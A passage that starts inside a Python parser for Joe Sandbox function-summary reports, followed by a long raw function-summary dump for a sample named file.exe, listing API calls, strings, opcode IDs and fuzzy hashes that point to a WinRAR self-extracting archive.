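    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            # A block starts at "APIs", or at "Strings" when no "APIs" section preceded it.
            if cur is None or line == "APIs" or (line == "Strings" and section != "APIs"):
                cur = FunctionSummary()
                blocks.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            parent = None
            sub = SUBCALL_RE.match(body)
            if sub:
                parent = int(sub.group("parent"), 16)
                body = sub.group("rest")
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), parent))
        elif section != "Strings":
            kv = KV_RE.match(body)
            if kv:
                cur.fields[kv.group("key").strip()] = kv.group("val").strip()
    return blocks


def imports(blocks: list[FunctionSummary]) -> set[str]:
    """MODULE!Name for every directly called API (nested subcalls excluded)."""
    return {f"{a.module}!{a.name}" for b in blocks for a in b.apis if a.subcall_of is None}


def find_by_string(blocks: list[FunctionSummary], needle: str) -> list[FunctionSummary]:
    """Blocks whose String ID entries contain the needle, for pivoting on artifacts."""
    return [b for b in blocks if any(needle in s for s in b.strings())]


if __name__ == "__main__":
    for b in parse_report(SAMPLE):
        print(b.fields.get("API String ID"), b.strings(), [f"{a.module}!{a.name}@{a.ref:08X}" for a in b.apis])
```

Feed it the whole function-summary section of a report and the `Opcode ID` / `Instruction Fuzzy Hash` fields become keys for matching routines across analyses, while `find_by_string` locates the routine that owns a given artifact (here, the `%s%s%u` temp-path format and the `RarHtmlClassName` window class).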
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                    • String ID: %08x
                                                                                    • API String ID: 1593746830-3682738293
                                                                                    • Opcode ID: 65f5f255e6b12e11c9fa2df007cecd70b21d7696ec10327f713b65fa80d2e151
                                                                                    • Instruction ID: b36f3565c724a1d83667de87a89fcd852bf494cf95b133026974b87e2d714397
                                                                                    • Opcode Fuzzy Hash: 65f5f255e6b12e11c9fa2df007cecd70b21d7696ec10327f713b65fa80d2e151
                                                                                    • Instruction Fuzzy Hash: D6411732904354EED731EA20CC49ABB67EDEB99711F11052AFD69AB182E7349D48C3A1
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000000), ref: 001685B5
                                                                                    • GetWindowRect.USER32(?,?), ref: 001685DA
                                                                                    • ShowWindow.USER32(?,00000005,?), ref: 00168671
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00168679
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0016868F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$RectText
                                                                                    • String ID: RarHtmlClassName
                                                                                    • API String ID: 3937224194-1658105358
                                                                                    • Opcode ID: a1d76ef67d135f637f7eb83d65d86e2a991df601f7ea27906728538d9568666c
                                                                                    • Instruction ID: fc37cbc14a7f49d9b23bc6f22e3226d7b03d4c8b0235df5fbae7c0c1bbf76262
                                                                                    • Opcode Fuzzy Hash: a1d76ef67d135f637f7eb83d65d86e2a991df601f7ea27906728538d9568666c
                                                                                    • Instruction Fuzzy Hash: FA31B032101304AFDB219F64DD88B5BBFA9FF48701F00455AFE09AA592DB70DA50CBA2
                                                                                    APIs
                                                                                      • Part of subcall function 001792D3: _free.LIBCMT ref: 001792FC
                                                                                    • _free.LIBCMT ref: 0017935D
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 00179368
                                                                                    • _free.LIBCMT ref: 00179373
                                                                                    • _free.LIBCMT ref: 001793C7
                                                                                    • _free.LIBCMT ref: 001793D2
                                                                                    • _free.LIBCMT ref: 001793DD
                                                                                    • _free.LIBCMT ref: 001793E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                    • Instruction ID: 9a1d1e29c11c6fa7727a6d6a2747e13f00ed9787918537c8929dfaddc287eabe
                                                                                    • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                    • Instruction Fuzzy Hash: 5F11C971A45B04FADA20BBB0CC47FCB77BDAF14714F808815B29DA6193DB75B9488650
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00170C0B,0016E662), ref: 00170C22
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00170C30
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00170C49
                                                                                    • SetLastError.KERNEL32(00000000,?,00170C0B,0016E662), ref: 00170C9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: e2a7e64de537ce4ca7f012f67dc9f9dc9a11b9961bae36dc1fe8ee3e30a85492
                                                                                    • Instruction ID: 2713f71f8b8b3bca3a5f4a547bba5a69d0eb2b314d27ab26852af5679b0faab0
                                                                                    • Opcode Fuzzy Hash: e2a7e64de537ce4ca7f012f67dc9f9dc9a11b9961bae36dc1fe8ee3e30a85492
                                                                                    • Instruction Fuzzy Hash: 05014733288311AEF72727B86C8A9272678EF187B4B70832BFA1C440E1EF614E405280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 0-1718035505
                                                                                    APIs
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001600AE
                                                                                      • Part of subcall function 0015A8E0: GetVersionExW.KERNEL32(?), ref: 0015A905
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001600D0
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 001600EA
                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001600FB
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0016010B
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00160117
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2092733347-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015FB07
                                                                                    • EnterCriticalSection.KERNEL32(00191E74,00000000,?,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?), ref: 0015FB15
                                                                                    • new.LIBCMT ref: 0015FB35
                                                                                    • new.LIBCMT ref: 0015FB6B
                                                                                    • LeaveCriticalSection.KERNEL32(00191E74,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?,00008000,?), ref: 0015FB8B
                                                                                    • LeaveCriticalSection.KERNEL32(00191E74,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF,?,00008000,?), ref: 0015FB96
                                                                                      • Part of subcall function 0015F930: InitializeCriticalSection.KERNEL32(000001A0,00191E74,00000000,?,?,0015FB88,00000020,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?), ref: 0015F969
                                                                                      • Part of subcall function 0015F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F973
                                                                                      • Part of subcall function 0015F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F983
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                    • String ID:
                                                                                    • API String ID: 3919453512-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,0018CBE8,00172674,0018CBE8,?,?,00172213,?,?,0018CBE8), ref: 00176323
                                                                                    • _free.LIBCMT ref: 00176356
                                                                                    • _free.LIBCMT ref: 0017637E
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 0017638B
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176397
                                                                                    • _abort.LIBCMT ref: 0017639D
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 0016B86B
                                                                                    • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0016B881
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0016B89B
                                                                                    • SetDlgItemTextW.USER32(?,00000066), ref: 0016B8A6
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00174A90,?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002), ref: 00174AFF
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00174B12
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00174A90,?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174B35
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    APIs
                                                                                      • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                      • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0015DED4
                                                                                    • GetProcAddress.KERNEL32(00191E58,CryptUnprotectMemory), ref: 0015DEE4
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                    • API String ID: 2141747552-1753850145
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 001789B8
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001789DB
                                                                                      • Part of subcall function 001759FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00178A01
                                                                                    • _free.LIBCMT ref: 00178A14
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00178A23
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    • Opcode ID: 67650fecb1d4e992d2f2a3216c7e3bed456ece01bab65bee56c9682ba3636ca2
                                                                                    • Instruction ID: 5d61ec1664636545dc3bdcc09fe47f0afaf62e02ebdb45ea00c8c661ce89f9b5
                                                                                    • Opcode Fuzzy Hash: 67650fecb1d4e992d2f2a3216c7e3bed456ece01bab65bee56c9682ba3636ca2
                                                                                    • Instruction Fuzzy Hash: 63018472A416197B272156BA5C8CC7B6A7DDFCAFB0315412AF908D3101EF708D0182B1
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,00175E43,00175ADF,?,0017634D,00000001,00000364,?,00172213,?,?,0018CBE8), ref: 001763A8
                                                                                    • _free.LIBCMT ref: 001763DD
                                                                                    • _free.LIBCMT ref: 00176404
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176411
                                                                                    • SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 0017641A
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    • Opcode ID: 9bcf1987c2a1b17771283cb7a4bf3d058caaf939ff1f1a79820e97d7289282dc
                                                                                    • Instruction ID: 869e861887c150c9de21e8d4a2fe587bcd8fdb4391420948b0c2456d0f70318d
                                                                                    • Opcode Fuzzy Hash: 9bcf1987c2a1b17771283cb7a4bf3d058caaf939ff1f1a79820e97d7289282dc
                                                                                    • Instruction Fuzzy Hash: C7014476345F006BC71667342C89A2B363EEFE13B5B31C038F62DA2182EF718D008260
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00179282
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 00179294
                                                                                    • _free.LIBCMT ref: 001792A6
                                                                                    • _free.LIBCMT ref: 001792B8
                                                                                    • _free.LIBCMT ref: 001792CA
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 997ce26b85621e13be91d8e725a2e9a21363395f83357d3e310e7fa5b8b3b32d
                                                                                    • Instruction ID: c123b12fe0dce9f28df2b3f286595286fc6f45faf90c1e3bb4b14de39b95cb84
                                                                                    • Opcode Fuzzy Hash: 997ce26b85621e13be91d8e725a2e9a21363395f83357d3e310e7fa5b8b3b32d
                                                                                    • Instruction Fuzzy Hash: B4F04F32605700FB9A20FB68E882C4673FAAF113217948806F54CD7912CB75FCC18660
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0017555D
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 0017556F
                                                                                    • _free.LIBCMT ref: 00175582
                                                                                    • _free.LIBCMT ref: 00175593
                                                                                    • _free.LIBCMT ref: 001755A4
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: ee704ee40e0681bd6fd2b3f62edb2d888ae95c110a33254e4e085c6fcf3a2a47
                                                                                    • Instruction ID: 67afe9834ab2eac360e55b87c1aaec260cef0991d2c2755429ed9ec162c36fa2
                                                                                    • Opcode Fuzzy Hash: ee704ee40e0681bd6fd2b3f62edb2d888ae95c110a33254e4e085c6fcf3a2a47
                                                                                    • Instruction Fuzzy Hash: B5F05EB0916A60DF8F06AF78FC414483BB2FF16B21385810BF41852A72C77A0981DBA3
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00174C1A
                                                                                    • _free.LIBCMT ref: 00174CE5
                                                                                    • _free.LIBCMT ref: 00174CEF
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                                    • API String ID: 2506810119-1957095476
                                                                                    • Opcode ID: de2459ea93bfa9acc17c03f2d28f91e0ab76ff5ea57179e946ec54989d49fc58
                                                                                    • Instruction ID: 9d71b75e604413f5fa5916c7a466ff2bdf51157498d909cac177af76794232ce
                                                                                    • Opcode Fuzzy Hash: de2459ea93bfa9acc17c03f2d28f91e0ab76ff5ea57179e946ec54989d49fc58
                                                                                    • Instruction Fuzzy Hash: 0B319471A05258EFDB22DF99DC8599EBBFCEF95310F118066F90897211D7708E80CB91
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00157468
                                                                                      • Part of subcall function 00153AA3: __EH_prolog.LIBCMT ref: 00153AA8
                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0015752E
                                                                                      • Part of subcall function 00157A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00157AAC
                                                                                      • Part of subcall function 00157A9D: GetLastError.KERNEL32 ref: 00157AF2
                                                                                      • Part of subcall function 00157A9D: CloseHandle.KERNEL32(?), ref: 00157B01
                                                                                    Similarity
                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3813983858-639343689
                                                                                    • Opcode ID: 9b84dadd82598c020de4d44ebdfa4f23b4b60df23733075bab2408ad3c245092
                                                                                    • Instruction ID: 7583e01722d2f75b7a360ee6450eb6ea065beadf29b86815c13a45ad533991b3
                                                                                    • Opcode Fuzzy Hash: 9b84dadd82598c020de4d44ebdfa4f23b4b60df23733075bab2408ad3c245092
                                                                                    • Instruction Fuzzy Hash: B131D571904248EEDF11EF68EC03BEE7B78AF55345F004029FC65AB192D7704A48CBA1
                                                                                    APIs
                                                                                    • CharUpperW.USER32(?,?,?,?,00001000), ref: 0016A92C
                                                                                    • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0016A953
                                                                                    Similarity
                                                                                    • API ID: CharUpper
                                                                                    • String ID: -
                                                                                    • API String ID: 9403516-2547889144
                                                                                    • Opcode ID: 599dbb343c671a54b67d63595d37c928eae73838d0b9b11ad278ca5b4788cbd1
                                                                                    • Instruction ID: 7bff409e8c52ea465222a15bcc40fb102c05d7a5fcc9034d3b9a6dbcbca285b2
                                                                                    • Opcode Fuzzy Hash: 599dbb343c671a54b67d63595d37c928eae73838d0b9b11ad278ca5b4788cbd1
                                                                                    • Instruction Fuzzy Hash: 6321057340420695D325EB288C0CB7BB698EF5531DFA2482BF495E6841E774D8F8DBA3
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 001691AB
                                                                                    • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 001691C0
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 001691D5
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: 6ca8786ff9b0253f5b73c100f9a4f9e06b53accab2f212a795af0c0b8cd86a92
                                                                                    • Instruction ID: 49cf9169058bfd35a6c3cbcf39bdf66c891e7321f28347352cd68fa725562b6a
                                                                                    • Opcode Fuzzy Hash: 6ca8786ff9b0253f5b73c100f9a4f9e06b53accab2f212a795af0c0b8cd86a92
                                                                                    • Instruction Fuzzy Hash: EE11D332241203BFE215ABA4DD4DF663BADAF4B725F210010F6419B8A0C3729D69DB22
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • EndDialog.USER32(?,00000001), ref: 00169694
                                                                                    • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 001696AC
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 001696DA
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1
                                                                                    • API String ID: 445417207-3292211884
                                                                                    • Opcode ID: 469fce5927a91c06e27b5dce30d5bd77e4bb8149276ae6af0b2a91d51130dac2
                                                                                    • Instruction ID: 344a2ba8d4a42f2c29c86a9d2b4539011e8d12247440ed5b09d32d37e1c53357
                                                                                    • Opcode Fuzzy Hash: 469fce5927a91c06e27b5dce30d5bd77e4bb8149276ae6af0b2a91d51130dac2
                                                                                    • Instruction Fuzzy Hash: 21110432904219B7EB25AE64DD49FFA376CEF19750F010022FA49F7880C7B5AE6497B1
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0015B127
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0015B145
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0015B155
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    • Opcode ID: 62b405175dd6a8cc326a1ab06a5de7e605ad8dc7baf7da211ce91330a97b35e6
                                                                                    • Instruction ID: 893a0969a008273fbf9ad07f25b12768ac98bf2dc40ad63e3ec4ca56f4ea926d
                                                                                    • Opcode Fuzzy Hash: 62b405175dd6a8cc326a1ab06a5de7e605ad8dc7baf7da211ce91330a97b35e6
                                                                                    • Instruction Fuzzy Hash: A901F913508711F5C6706B65ACC1C6BB7BCEF65361B50841BFC68DA481FB30D859C2B1
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(000001A0,00191E74,00000000,?,?,0015FB88,00000020,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?), ref: 0015F969
                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F973
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0015A7C2,?,0015C74B,?,00000000,?,00000001,?,?,?,00163AFF), ref: 0015F983
                                                                                    Strings
                                                                                    • Thread pool initialization failed., xrefs: 0015F99B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: d60f1059c2cc0b2ff023520d0019bd05b5a0f0ac0f5ab4a95a0593abc41cd69e
                                                                                    • Instruction ID: 8448c85c0c5463f1a69fec7d3cf2af97004f309a226fbb0b75dc0217bae001e3
                                                                                    • Opcode Fuzzy Hash: d60f1059c2cc0b2ff023520d0019bd05b5a0f0ac0f5ab4a95a0593abc41cd69e
                                                                                    • Instruction Fuzzy Hash: 421151B1500705EFD3205F659889AA7FBECFF55395F10482EF6EA87100DB716885CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
